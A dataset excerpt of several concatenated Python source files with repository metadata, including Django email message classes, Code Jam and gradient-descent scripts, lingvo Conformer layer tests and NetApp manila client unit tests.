        All strings used to create the message can be unicode strings
        (or UTF-8 bytestrings). The SafeMIMEText class will handle any
        necessary encoding conversions.
        """
        if to:
            assert not isinstance(to, six.string_types), '"to" argument must be a list or tuple'
            self.to = list(to)
        else:
            self.to = []
        if cc:
            assert not isinstance(cc, six.string_types), '"cc" argument must be a list or tuple'
            self.cc = list(cc)
        else:
            self.cc = []
        if bcc:
            assert not isinstance(bcc, six.string_types), '"bcc" argument must be a list or tuple'
            self.bcc = list(bcc)
        else:
            self.bcc = []
        self.from_email = from_email or settings.DEFAULT_FROM_EMAIL
        self.subject = subject
        self.body = body
        self.attachments = attachments or []
        self.extra_headers = headers or {}
        self.connection = connection

    def get_connection(self, fail_silently=False):
        """Return (lazily creating) the backend connection used to send."""
        from django.core.mail import get_connection
        if not self.connection:
            self.connection = get_connection(fail_silently=fail_silently)
        return self.connection

    def message(self):
        """Build and return the MIME message object for this email."""
        encoding = self.encoding or settings.DEFAULT_CHARSET
        msg = SafeMIMEText(self.body, self.content_subtype, encoding)
        msg = self._create_message(msg)
        msg['Subject'] = self.subject
        # Explicit extra headers win over the instance attributes.
        msg['From'] = self.extra_headers.get('From', self.from_email)
        msg['To'] = self.extra_headers.get('To', ', '.join(self.to))
        if self.cc:
            msg['Cc'] = ', '.join(self.cc)
        # Email header names are case-insensitive (RFC 2045), so we have to
        # accommodate that when doing comparisons.
        header_names = [key.lower() for key in self.extra_headers]
        if 'date' not in header_names:
            msg['Date'] = formatdate()
        if 'message-id' not in header_names:
            msg['Message-ID'] = make_msgid()
        for name, value in self.extra_headers.items():
            if name.lower() in ('from', 'to'):  # From and To are already handled
                continue
            msg[name] = value
        return msg

    def recipients(self):
        """
        Returns a list of all recipients of the email (includes direct
        addressees as well as Cc and Bcc entries).
        """
        return self.to + self.cc + self.bcc

    def send(self, fail_silently=False):
        """Sends the email message."""
        if not self.recipients():
            # Don't bother creating the network connection if there's nobody to
            # send to.
            return 0
        return self.get_connection(fail_silently).send_messages([self])

    def attach(self, filename=None, content=None, mimetype=None):
        """
        Attaches a file with the given filename and content. The filename can
        be omitted and the mimetype is guessed, if not provided.

        If the first parameter is a MIMEBase subclass it is inserted directly
        into the resulting message attachments.
        """
        if isinstance(filename, MIMEBase):
            # A prebuilt MIME object carries its own content/type; the other
            # arguments must not be supplied.  (Fixed: compare to None with
            # ``is``, not ``==``.)
            assert content is None and mimetype is None
            self.attachments.append(filename)
        else:
            assert content is not None
            self.attachments.append((filename, content, mimetype))

    def attach_file(self, path, mimetype=None):
        """Attaches a file from the filesystem."""
        filename = os.path.basename(path)
        with open(path, 'rb') as f:
            content = f.read()
        self.attach(filename, content, mimetype)

    def _create_message(self, msg):
        return self._create_attachments(msg)

    def _create_attachments(self, msg):
        """Wrap *msg* in a multipart/mixed container when attachments exist."""
        if self.attachments:
            encoding = self.encoding or settings.DEFAULT_CHARSET
            body_msg = msg
            msg = SafeMIMEMultipart(_subtype=self.mixed_subtype, encoding=encoding)
            if self.body:
                msg.attach(body_msg)
            for attachment in self.attachments:
                if isinstance(attachment, MIMEBase):
                    msg.attach(attachment)
                else:
                    msg.attach(self._create_attachment(*attachment))
        return msg

    def _create_mime_attachment(self, content, mimetype):
        """
        Converts the content, mimetype pair into a MIME attachment object.
        """
        basetype, subtype = mimetype.split('/', 1)
        if basetype == 'text':
            encoding = self.encoding or settings.DEFAULT_CHARSET
            attachment = SafeMIMEText(content, subtype, encoding)
        else:
            # Encode non-text attachments with base64.
            attachment = MIMEBase(basetype, subtype)
            attachment.set_payload(content)
            Encoders.encode_base64(attachment)
        return attachment

    def _create_attachment(self, filename, content, mimetype=None):
        """
        Converts the filename, content, mimetype triple into a MIME attachment
        object.
        """
        if mimetype is None:
            mimetype, _ = mimetypes.guess_type(filename)
            if mimetype is None:
                mimetype = DEFAULT_ATTACHMENT_MIME_TYPE
        attachment = self._create_mime_attachment(content, mimetype)
        if filename:
            try:
                filename.encode('ascii')
            except UnicodeEncodeError:
                # RFC 2231 three-tuple form for non-ASCII filenames.
                if six.PY2:
                    filename = filename.encode('utf-8')
                filename = ('utf-8', '', filename)
            attachment.add_header('Content-Disposition', 'attachment',
                                  filename=filename)
        return attachment
class EmailMultiAlternatives(EmailMessage):
    """
    A version of EmailMessage that makes it easy to send multipart/alternative
    messages. For example, including text and HTML versions of the text is
    made easier.
    """
    alternative_subtype = 'alternative'
    def __init__(self, subject='', body='', from_email=None, to=None, bcc=None,
            connection=None, attachments=None, headers=None, alternatives=None,
            cc=None):
        """
        Initialize a single email message (which can be sent to multiple
        recipients).
        All strings used to create the message can be unicode strings (or UTF-8
        bytestrings). The SafeMIMEText class will handle any necessary encoding
        conversions.
        """
        super(EmailMultiAlternatives, self).__init__(subject, body, from_email, to, bcc, connection, attachments, headers, cc)
        # alternatives: list of (content, mimetype) pairs.
        self.alternatives = alternatives or []
    def attach_alternative(self, content, mimetype):
        """Attach an alternative content representation."""
        assert content is not None
        assert mimetype is not None
        self.alternatives.append((content, mimetype))
    def _create_message(self, msg):
        # Alternatives go inside the message first, then attachments wrap it.
        return self._create_attachments(self._create_alternatives(msg))
    def _create_alternatives(self, msg):
        """Wrap *msg* in a multipart/alternative container when needed."""
        encoding = self.encoding or settings.DEFAULT_CHARSET
        if self.alternatives:
            body_msg = msg
            msg = SafeMIMEMultipart(_subtype=self.alternative_subtype, encoding=encoding)
            if self.body:
                msg.attach(body_msg)
            for alternative in self.alternatives:
                msg.attach(self._create_mime_attachment(*alternative))
        return msg
| [
"[email protected]"
]
| |
d55042888f85b776d9c53eb7f35d5f535bf6f671 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_74/268.py | e90272ff021d33b8a2ee2f63dff93259a4e40e74 | []
| no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 766 | py | def f(l):
begin={'O':1,'B':1}
last=l[0][0]
lasttime=0
result=0
for k in l:
robot=k[0]
if robot==last:
lasttime+=1+abs(k[1]-begin[robot])
result+=1+abs(k[1]-begin[robot])
begin[robot]=k[1]
else:
temp=abs(k[1]-begin[robot])
temp=max(temp,lasttime)
lasttime=1+temp-lasttime
result+=lasttime
begin[robot]=k[1]
last=robot
return result
def main():
    # Code Jam driver: first line is the number of test cases T; each case
    # line holds K followed by K (robot, button-position) pairs.
    s = input()
    T = int(s)
    for i in range(T):
        s = input()
        s = s.split(' ')
        k = int(s[0])
        s = s[1:]
        # l[j] = (robot colour 'O'/'B', target button position as int).
        # The comprehension's `i` is scoped to the comprehension (Python 3),
        # so the outer case index used in `i+1` below is unaffected.
        l = [(s[2*i],int(s[2*i+1])) for i in range(k)]
        print('Case #{0}: {1}'.format(i+1,f(l)))
main()
| [
"[email protected]"
]
| |
51f28b71ea08ed3bbd585cf7d38c3bdd57d362b4 | f6f4c87a1f2e750530a7d691da43514d84f99f5c | /hw12/a/q3.py | 6a3fdd0a408784e1ef313b123ef255e9c6c38d7a | []
| no_license | sarthak77/Basics-of-ML-AI | e941c6653bca95278cc62ee7ba229e8eaf4e309b | cb2ba9d271da919846211cf8496e29aff6beaa46 | refs/heads/master | 2020-07-25T10:33:54.420972 | 2020-01-09T19:25:57 | 2020-01-09T19:25:57 | 208,257,383 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,108 | py | import numpy as np
import matplotlib.pyplot as plt
def read_data(filename):
    """Load tab-separated numeric rows from *filename* and scale each of
    the six columns by its column mean, so every column has mean 1.0.

    Returns a list of 6-element lists of floats.
    """
    with open(filename, "r") as f:
        data = [np.array(line.split("\t")).astype('float64')
                for line in f.readlines()]
    mean = np.mean(data, axis=0)
    return [[row[i] / mean[i] for i in range(6)] for row in data]
def MSE_Gradient(w, data):
    """Gradient of the squared-error loss at weights *w*.

    Each row of *data* holds five features followed by the target in
    column 5; the feature vector used is the five features plus a bias
    term of 1 in the last slot.

    Fixes over the original version:
      * the target y is read from the row (``row[5]``) before the bias
        slot is overwritten — previously ``y = data[5]`` grabbed a whole
        row (or raised IndexError for short datasets);
      * rows are copied, so the caller's data is never mutated in place;
      * per-row contributions are accumulated (matching the
        ``np.zeros(6)`` initialisation) instead of being overwritten.
    """
    neg_grad = np.zeros(6)
    for row in data:
        y = row[5]                       # target, read before overwriting
        x = np.array(row, dtype='float64')
        x[5] = 1                         # bias feature
        neg_grad += (np.dot(w, x) - y) * x
    return neg_grad
def MSE_Loss(w, data):
    """Mean squared error of the predictions w·x over *data*.

    Each row holds five features plus the target in column 5; a bias
    term of 1 replaces the target slot in the feature vector.

    Fixes over the original version: the target y is captured *before*
    the bias slot is set to 1 — previously ``x = data[i]`` aliased the
    row, so ``x[5] = 1`` made ``y == 1`` for every row — and rows are
    copied so the caller's data is not mutated.
    """
    loss = 0.0
    for row in data:
        y = row[5]                       # target, read before overwriting
        x = np.array(row, dtype='float64')
        x[5] = 1                         # bias feature
        loss += (np.dot(w, x) - y) ** 2
    return loss / len(data)
# Normal GDE
def Normal_GDE(data):
    """Plain gradient descent with a fixed learning rate.

    Iterates until the loss drops below 1e-3 or changes by less than
    1e-5 between iterations.  Prints progress and the final weights;
    returns nothing.
    """
    print("Normal GDE")
    alpha = 0.00005  # fixed step size
    iters = 0
    w = np.zeros(6)
    prev_loss = 10  # sentinel larger than any expected initial loss
    loss = MSE_Loss(w,data)
    while prev_loss > 1e-3 and abs(prev_loss - loss) > 1e-5 :
        # loss is pretty less or loss doesn't change much
        iters += 1
        prev_loss = loss
        print("ITERATION = ",iters,", Loss = ",loss)
        gradient = MSE_Gradient(w,data)
        w = w - alpha*gradient
        loss = MSE_Loss(w,data)
    print("FINAL W = ",w," AFTER ",iters," ITERATIONS ")
# Optimized Learning Rate GDE
def Optimized_Learning_GDE(data):
    """Gradient descent with an exact line-search step size.

    The step alpha_opt = ||g||^2 / (g^T H g) is optimal for a quadratic
    loss, where H is the (unscaled) Hessian sum of outer products x x^T.
    Prints progress and the final weights; returns nothing.
    """
    print("OPTIMIZED LEARNING RATE GDE")
    iters = 0
    w = np.zeros(6)
    prev_loss = 10  # sentinel larger than any expected initial loss
    loss = MSE_Loss(w,data)
    while prev_loss > 1e-3 and abs(prev_loss - loss) > 1e-5 :
        # loss is pretty less or loss doesn't change much
        iters += 1
        prev_loss = loss
        print("ITERATION = ",iters,", Loss = ",loss)
        gradient = MSE_Gradient(w,data)
        hessian = np.zeros([6,6])
        for i in range(0, len(data)):
            # NOTE(review): x aliases data[i], so `x[5] = 1` overwrites the
            # target column of the dataset in place on the first pass —
            # later loss/gradient computations see a clobbered target.
            # Looks unintended; confirm and copy the row instead.
            x = data[i]
            x[5] = 1
            x = np.array(x)
            hessian += np.outer(x,x)
        # Exact line-search step for a quadratic: ||g||^2 / (g^T H g).
        alpha_opt = (np.linalg.norm(gradient)**2)/(np.dot(gradient,np.dot(hessian,gradient)))
        w = w - alpha_opt*gradient
        loss = MSE_Loss(w,data)
    print("FINAL W = ",w,"\n AFTER ",iters," ITERATIONS AND LOSS = ",loss)
data = read_data("airfoil_self_noise.dat")
# Normal_GDE(data)
Optimized_Learning_GDE(data) | [
"[email protected]"
]
| |
16689823e89dd4a3b15cad04a6054513fc61b631 | 9cb0543499fd473a609b6cb19f0db921586f5b48 | /lingvo/core/conformer_layer_test.py | b2ded4a207307e78ff392a2aa6065a1f3785bc68 | [
"Apache-2.0"
]
| permissive | Harshs27/lingvo | bbb852eb3cd69b64813268857d91571241b12a40 | bd396e651488b2e2c4a7416be077b4a0226c87c8 | refs/heads/master | 2022-12-01T05:43:24.300541 | 2020-08-11T00:16:33 | 2020-08-11T00:17:08 | 286,606,464 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,289 | py | # Lint as: python3
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for conformer layers as in https://arxiv.org/abs/2005.08100."""
# Lint as: PY3
from absl.testing import parameterized
from lingvo import compat as tf
from lingvo.core import conformer_layer
from lingvo.core import test_utils
class LConvLayerTest(test_utils.TestCase, parameterized.TestCase):
  """Smoke tests for the Conformer lightweight-convolution (LConv) layer."""

  def testBasic(self):
    # Forward-prop a zero batch through an LConv layer; the test only
    # checks that construction and FProp run without error.
    batch, seqlen, dim = 2, 16, 4
    inputs = tf.zeros([batch, seqlen, dim])
    paddings = tf.zeros([batch, seqlen])
    p = conformer_layer.LConvLayer.CommonParams(input_dim=dim, kernel_size=3)
    p.name = 'lconv_layer'
    l = p.Instantiate()
    outputs = l.FPropDefaultTheta(inputs, paddings)
    with self.session() as sess:
      tf.global_variables_initializer().run()
      out_vals = sess.run(outputs)
      print([x.shape for x in out_vals])
class ConformerLayerTest(test_utils.TestCase, parameterized.TestCase):
  """Smoke tests for the full Conformer block (attention + conv + FF)."""

  def testBasic(self):
    # Forward-prop a zero batch through a Conformer layer with local
    # attention (context window of 2); only checks that FProp runs.
    batch, seqlen, dim, heads = 2, 32, 4, 2
    context = 2
    inputs = tf.zeros([batch, seqlen, dim])
    paddings = tf.zeros([batch, seqlen])
    p = conformer_layer.ConformerLayer.CommonParams(
        input_dim=dim,
        atten_num_heads=heads,
        atten_left_context=context + 1,
        atten_right_context=context,
        kernel_size=3,
        fflayer_hidden_dim=4 * dim)
    p.name = 'conformer_layer'
    l = p.Instantiate()
    outputs = l.FPropDefaultTheta(inputs, paddings)
    with self.session() as sess:
      tf.global_variables_initializer().run()
      out_vals = sess.run(outputs)
      print([x.shape for x in out_vals])
if __name__ == '__main__':
tf.test.main()
| [
"[email protected]"
]
| |
26d874b2ef1277e4f7bbc5a3c0743aa9e19204b1 | 03a2c1eb549a66cc0cff72857963eccb0a56031d | /acmicpc/3106_error.py | cb083621f22b76ceccfd3a96d9d3a794dbb5ccd7 | []
| no_license | nobe0716/problem_solving | c56e24564dbe3a8b7093fb37cd60c9e0b25f8e59 | cd43dc1eddb49d6b5965419e36db708c300dadf5 | refs/heads/master | 2023-01-21T14:05:54.170065 | 2023-01-15T16:36:30 | 2023-01-15T16:36:30 | 80,906,041 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,011 | py | class Employee:
def __init__(self, _id, _income, _boss):
self.id = _id
self.income = _income
self.boss = _boss
class EmployeeGroup:
    """A group of bosses dominated by a single top-earning employee."""

    def __init__(self, _income, _employee, _bosses):
        # income/employee: the group's top earner; _bosses: the Employees
        # currently absorbed beneath that earner.
        self.income, self.employee, self.bosses = _income, _employee, _bosses
def raiseIncome(employee_group_mapping, newbie):
    """Insert *newbie* into the hierarchy, merging dominated groups upward.

    employee_group_mapping maps employee id -> EmployeeGroup.  Returns the
    number of bosses absorbed into the newbie's (possibly taken-over) group.
    NOTE(review): file is named ``3106_error.py`` — treat this logic as
    suspect; the hedged notes below mark the questionable spots.
    """
    # Take over the boss's group when the boss heads it and earns less;
    # otherwise start a fresh single-member group for the newbie.
    if employee_group_mapping[newbie.boss.id].employee.id == newbie.boss.id and employee_group_mapping[newbie.boss.id].income < newbie.income: # succeed
        employee_group = employee_group_mapping[newbie.boss.id]
        employee_group.employee = newbie
        employee_group.income = newbie.income
        employee_group.bosses.append(newbie.boss)
    else:
        # NOTE(review): newbie.id is mapped here but the takeover branch
        # above never maps newbie.id — presumably it reuses the boss's
        # entry; confirm that lookups by newbie.id cannot occur afterwards.
        employee_group = EmployeeGroup(newbie.income, newbie, [])
        employee_group_mapping[newbie.id] = employee_group
    # Walk up the chain of command, absorbing every boss whose current
    # group earns less than ours.
    boss = newbie.boss
    while boss is not None:
        if boss not in employee_group.bosses:
            employee_group_of_boss = employee_group_mapping[boss.id]
            if employee_group_of_boss.income < employee_group.income:
                employee_group_mapping[boss.id] = employee_group
                employee_group.bosses.append(boss)
                if employee_group_of_boss.employee.id == boss.id:
                    # The boss headed their own group: absorb all of its
                    # members into ours and empty the old group.
                    for e in employee_group_of_boss.bosses:
                        employee_group_mapping[e.id] = employee_group
                    employee_group.bosses += employee_group_of_boss.bosses
                    employee_group_of_boss.bosses.clear()
            else:
                # NOTE(review): removing the boss from the richer group's
                # member list here looks asymmetric; verify intent.
                employee_group_of_boss.bosses.remove(boss)
        boss = boss.boss
    return len(employee_group.bosses)
n = int(input())
i = int(input())
employees = [Employee(0, i, None)]
employee_group_mapping = {0:EmployeeGroup(i, employees[0], [])}
for id in range(1, n + 1):
i, b = map(int, input().split())
newbie = Employee(id, i, employees[b])
employees.append(newbie)
print(raiseIncome(employee_group_mapping, newbie))
| [
"[email protected]"
]
| |
b0a538508972c28c67ab59ada3be21cef0904ac3 | bc65ef147e4724be72475e0caa9bbb2c3e9e8f15 | /manila/tests/share/drivers/netapp/dataontap/client/test_client_cmode.py | fc6c504b9190018fd721dd737c5de6b84932cbda | [
"Apache-2.0"
]
| permissive | scottwedge/manila-base | d3c8dc8fa40131033ae55b8d874c4c0d18009fbd | dcb972cfad38b2826301b7ca86062689577e32e3 | refs/heads/master | 2021-03-01T01:55:47.047392 | 2020-03-08T03:40:00 | 2020-03-08T03:40:00 | 245,746,428 | 0 | 0 | Apache-2.0 | 2020-03-08T03:37:21 | 2020-03-08T03:37:21 | null | UTF-8 | Python | false | false | 188,711 | py | # Copyright (c) 2014 Alex Meade. All rights reserved.
# Copyright (c) 2015 Clinton Knight. All rights reserved.
# Copyright (c) 2015 Tom Barron. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import hashlib
import time
import ddt
import mock
from oslo_log import log
import six
from manila import exception
from manila.share.drivers.netapp.dataontap.client import api as netapp_api
from manila.share.drivers.netapp.dataontap.client import client_base
from manila.share.drivers.netapp.dataontap.client import client_cmode
from manila import test
from manila.tests.share.drivers.netapp.dataontap.client import fakes as fake
@ddt.ddt
class NetAppClientCmodeTestCase(test.TestCase):
    def setUp(self):
        super(NetAppClientCmodeTestCase, self).setUp()
        # Mock loggers as themselves to allow logger arg validation
        mock_logger = log.getLogger('mock_logger')
        self.mock_object(client_cmode.LOG,
                         'error',
                         mock.Mock(side_effect=mock_logger.error))
        self.mock_object(client_cmode.LOG,
                         'warning',
                         mock.Mock(side_effect=mock_logger.warning))
        self.mock_object(client_cmode.LOG,
                         'debug',
                         mock.Mock(side_effect=mock_logger.debug))
        # Pin the reported ONTAPI version so client init never talks to a
        # real filer.
        self.mock_object(client_base.NetAppBaseClient,
                         'get_ontapi_version',
                         mock.Mock(return_value=(1, 20)))
        # One cluster-scoped and one vserver-scoped client, both with
        # fully mocked API connections.
        self.client = client_cmode.NetAppCmodeClient(**fake.CONNECTION_INFO)
        self.client.connection = mock.MagicMock()
        self.vserver_client = client_cmode.NetAppCmodeClient(
            **fake.CONNECTION_INFO)
        self.vserver_client.set_vserver(fake.VSERVER_NAME)
        self.vserver_client.connection = mock.MagicMock()
    def _mock_api_error(self, code='fake'):
        # Helper: a mock whose call raises NaApiError with the given code.
        return mock.Mock(side_effect=netapp_api.NaApiError(code=code))
    def test_init_features_ontapi_1_21(self):
        # ONTAPI 1.21 predates broadcast domains, ipspaces and subnets.
        self.mock_object(client_base.NetAppBaseClient,
                         'get_ontapi_version',
                         mock.Mock(return_value=(1, 21)))
        self.client._init_features()
        self.assertFalse(self.client.features.BROADCAST_DOMAINS)
        self.assertFalse(self.client.features.IPSPACES)
        self.assertFalse(self.client.features.SUBNETS)
    @ddt.data((1, 30), (1, 40), (2, 0))
    def test_init_features_ontapi_1_30(self, ontapi_version):
        # ONTAPI >= 1.30 enables broadcast domains, ipspaces and subnets.
        self.mock_object(client_base.NetAppBaseClient,
                         'get_ontapi_version',
                         mock.Mock(return_value=ontapi_version))
        self.client._init_features()
        self.assertTrue(self.client.features.BROADCAST_DOMAINS)
        self.assertTrue(self.client.features.IPSPACES)
        self.assertTrue(self.client.features.SUBNETS)
    def test_invoke_vserver_api(self):
        # The vserver must be selected on the connection before invoking.
        self.client._invoke_vserver_api('fake-api', 'fake_vserver')
        self.client.connection.set_vserver.assert_has_calls(
            [mock.call('fake_vserver')])
        self.client.connection.invoke_successfully.assert_has_calls(
            [mock.call('fake-api', True)])
    def test_has_records(self):
        # A response with num-records > 0 reports True.
        self.assertTrue(self.client._has_records(
            netapp_api.NaElement(fake.VSERVER_GET_ITER_RESPONSE)))
    def test_has_records_not_found(self):
        # An empty (zero-record) response reports False.
        self.assertFalse(self.client._has_records(
            netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)))
    @ddt.data((fake.VSERVER_GET_ITER_RESPONSE, 1),
              (fake.NO_RECORDS_RESPONSE, 0))
    @ddt.unpack
    def test_get_record_count(self, response, expected):
        # num-records is parsed from the response into an int.
        api_response = netapp_api.NaElement(response)
        result = self.client._get_record_count(api_response)
        self.assertEqual(expected, result)
    def test_get_records_count_invalid(self):
        # A response missing num-records raises NetAppException.
        api_response = netapp_api.NaElement(
            fake.INVALID_GET_ITER_RESPONSE_NO_RECORDS)
        self.assertRaises(exception.NetAppException,
                          self.client._get_record_count,
                          api_response)
    def test_send_iter_request(self):
        # Three paged responses: the iterator should stitch them into a
        # single 28-record result and pass each page's continuation tag
        # on the follow-up request.
        api_responses = [
            netapp_api.NaElement(fake.STORAGE_DISK_GET_ITER_RESPONSE_PAGE_1),
            netapp_api.NaElement(fake.STORAGE_DISK_GET_ITER_RESPONSE_PAGE_2),
            netapp_api.NaElement(fake.STORAGE_DISK_GET_ITER_RESPONSE_PAGE_3),
        ]
        mock_send_request = self.mock_object(
            self.client, 'send_request',
            mock.Mock(side_effect=api_responses))
        storage_disk_get_iter_args = {
            'desired-attributes': {
                'storage-disk-info': {
                    'disk-name': None,
                }
            }
        }
        result = self.client.send_iter_request(
            'storage-disk-get-iter', api_args=storage_disk_get_iter_args,
            max_page_length=10)
        num_records = result.get_child_content('num-records')
        self.assertEqual('28', num_records)
        # The merged result must not leak a dangling continuation tag.
        next_tag = result.get_child_content('next-tag')
        self.assertEqual('', next_tag)
        args1 = copy.deepcopy(storage_disk_get_iter_args)
        args1['max-records'] = 10
        args2 = copy.deepcopy(storage_disk_get_iter_args)
        args2['max-records'] = 10
        args2['tag'] = 'next_tag_1'
        args3 = copy.deepcopy(storage_disk_get_iter_args)
        args3['max-records'] = 10
        args3['tag'] = 'next_tag_2'
        mock_send_request.assert_has_calls([
            mock.call('storage-disk-get-iter', args1),
            mock.call('storage-disk-get-iter', args2),
            mock.call('storage-disk-get-iter', args3),
        ])
    def test_send_iter_request_single_page(self):
        # A response without a next-tag requires exactly one API call.
        api_response = netapp_api.NaElement(
            fake.STORAGE_DISK_GET_ITER_RESPONSE)
        mock_send_request = self.mock_object(
            self.client, 'send_request',
            mock.Mock(return_value=api_response))
        storage_disk_get_iter_args = {
            'desired-attributes': {
                'storage-disk-info': {
                    'disk-name': None,
                }
            }
        }
        result = self.client.send_iter_request(
            'storage-disk-get-iter', api_args=storage_disk_get_iter_args,
            max_page_length=10)
        num_records = result.get_child_content('num-records')
        self.assertEqual('1', num_records)
        args = copy.deepcopy(storage_disk_get_iter_args)
        args['max-records'] = 10
        mock_send_request.assert_has_calls([
            mock.call('storage-disk-get-iter', args),
        ])
    def test_send_iter_request_not_found(self):
        # No api_args: the default max page length is injected and an
        # empty result is returned unchanged.
        api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
        mock_send_request = self.mock_object(
            self.client, 'send_request',
            mock.Mock(return_value=api_response))
        result = self.client.send_iter_request('storage-disk-get-iter')
        num_records = result.get_child_content('num-records')
        self.assertEqual('0', num_records)
        args = {'max-records': client_cmode.DEFAULT_MAX_PAGE_LENGTH}
        mock_send_request.assert_has_calls([
            mock.call('storage-disk-get-iter', args),
        ])
    @ddt.data(fake.INVALID_GET_ITER_RESPONSE_NO_ATTRIBUTES,
              fake.INVALID_GET_ITER_RESPONSE_NO_RECORDS)
    def test_send_iter_request_invalid(self, fake_response):
        # Malformed iterator responses must surface as NetAppException.
        api_response = netapp_api.NaElement(fake_response)
        self.mock_object(self.client,
                         'send_request',
                         mock.Mock(return_value=api_response))
        self.assertRaises(exception.NetAppException,
                          self.client.send_iter_request,
                          'storage-disk-get-iter')
    def test_set_vserver(self):
        # set_vserver must be forwarded to the underlying connection.
        self.client.set_vserver(fake.VSERVER_NAME)
        self.client.connection.set_vserver.assert_has_calls(
            [mock.call('fake_vserver')])
    def test_vserver_exists(self):
        # A matching vserver-get-iter record means the vserver exists;
        # the query/desired-attributes payload is verified exactly.
        api_response = netapp_api.NaElement(fake.VSERVER_GET_ITER_RESPONSE)
        self.mock_object(self.client,
                         'send_iter_request',
                         mock.Mock(return_value=api_response))
        vserver_get_args = {
            'query': {'vserver-info': {'vserver-name': fake.VSERVER_NAME}},
            'desired-attributes': {'vserver-info': {'vserver-name': None}}
        }
        result = self.client.vserver_exists(fake.VSERVER_NAME)
        self.client.send_iter_request.assert_has_calls([
            mock.call('vserver-get-iter', vserver_get_args)])
        self.assertTrue(result)
def test_vserver_exists_not_found(self):
    """vserver_exists is False when the query returns no records."""
    empty_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
    self.mock_object(
        self.client, 'send_request', mock.Mock(return_value=empty_response))
    self.assertFalse(self.client.vserver_exists(fake.VSERVER_NAME))
def test_create_vserver_no_ipspace(self):
    """create_vserver without an ipspace omits the 'ipspace' create arg."""
    self.mock_object(self.client, 'send_request')
    vserver_create_args = {
        'vserver-name': fake.VSERVER_NAME,
        'root-volume-security-style': 'unix',
        'root-volume-aggregate': fake.ROOT_VOLUME_AGGREGATE_NAME,
        'root-volume': fake.ROOT_VOLUME_NAME,
        'name-server-switch': {'nsswitch': 'file'}
    }
    vserver_modify_args = {
        'aggr-list': [{'aggr-name': aggr_name} for aggr_name
                      in fake.SHARE_AGGREGATE_NAMES],
        'vserver-name': fake.VSERVER_NAME
    }
    self.client.create_vserver(fake.VSERVER_NAME,
                               fake.ROOT_VOLUME_AGGREGATE_NAME,
                               fake.ROOT_VOLUME_NAME,
                               fake.SHARE_AGGREGATE_NAMES,
                               None)
    # A create call is followed by a modify call assigning the aggregates.
    self.client.send_request.assert_has_calls([
        mock.call('vserver-create', vserver_create_args),
        mock.call('vserver-modify', vserver_modify_args)])
def test_create_vserver_with_ipspace(self):
    """With the IPSPACES feature enabled, the ipspace is passed to create."""
    self.client.features.add_feature('IPSPACES')
    self.mock_object(self.client, 'send_request')
    vserver_create_args = {
        'vserver-name': fake.VSERVER_NAME,
        'root-volume-security-style': 'unix',
        'root-volume-aggregate': fake.ROOT_VOLUME_AGGREGATE_NAME,
        'root-volume': fake.ROOT_VOLUME_NAME,
        'name-server-switch': {'nsswitch': 'file'},
        'ipspace': fake.IPSPACE_NAME,
    }
    vserver_modify_args = {
        'aggr-list': [{'aggr-name': aggr_name} for aggr_name
                      in fake.SHARE_AGGREGATE_NAMES],
        'vserver-name': fake.VSERVER_NAME
    }
    self.client.create_vserver(fake.VSERVER_NAME,
                               fake.ROOT_VOLUME_AGGREGATE_NAME,
                               fake.ROOT_VOLUME_NAME,
                               fake.SHARE_AGGREGATE_NAMES,
                               fake.IPSPACE_NAME)
    self.client.send_request.assert_has_calls([
        mock.call('vserver-create', vserver_create_args),
        mock.call('vserver-modify', vserver_modify_args)])
def test_create_vserver_ipspaces_not_supported(self):
    """Requesting an ipspace without feature support raises NetAppException."""
    self.assertRaises(exception.NetAppException,
                      self.client.create_vserver,
                      fake.VSERVER_NAME,
                      fake.ROOT_VOLUME_AGGREGATE_NAME,
                      fake.ROOT_VOLUME_NAME,
                      fake.SHARE_AGGREGATE_NAMES,
                      fake.IPSPACE_NAME)
def test_get_vserver_root_volume_name(self):
    """get_vserver_root_volume_name queries root-volume for the vserver."""
    api_response = netapp_api.NaElement(
        fake.VSERVER_GET_ROOT_VOLUME_NAME_RESPONSE)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))
    vserver_get_args = {
        'query': {'vserver-info': {'vserver-name': fake.VSERVER_NAME}},
        'desired-attributes': {'vserver-info': {'root-volume': None}}
    }
    result = self.client.get_vserver_root_volume_name(fake.VSERVER_NAME)
    self.client.send_iter_request.assert_has_calls([
        mock.call('vserver-get-iter', vserver_get_args)])
    self.assertEqual(fake.ROOT_VOLUME_NAME, result)
def test_get_vserver_root_volume_name_not_found(self):
    """An empty response for the root volume lookup raises NetAppException."""
    api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
    self.mock_object(self.client,
                     'send_iter_request',
                     mock.Mock(return_value=api_response))
    self.assertRaises(exception.NetAppException,
                      self.client.get_vserver_root_volume_name,
                      fake.VSERVER_NAME)
def test_get_vserver_ipspace(self):
    """get_vserver_ipspace returns the ipspace from vserver-get-iter."""
    self.client.features.add_feature('IPSPACES')
    api_response = netapp_api.NaElement(
        fake.VSERVER_GET_IPSPACE_NAME_RESPONSE)
    self.mock_object(self.client,
                     'send_iter_request',
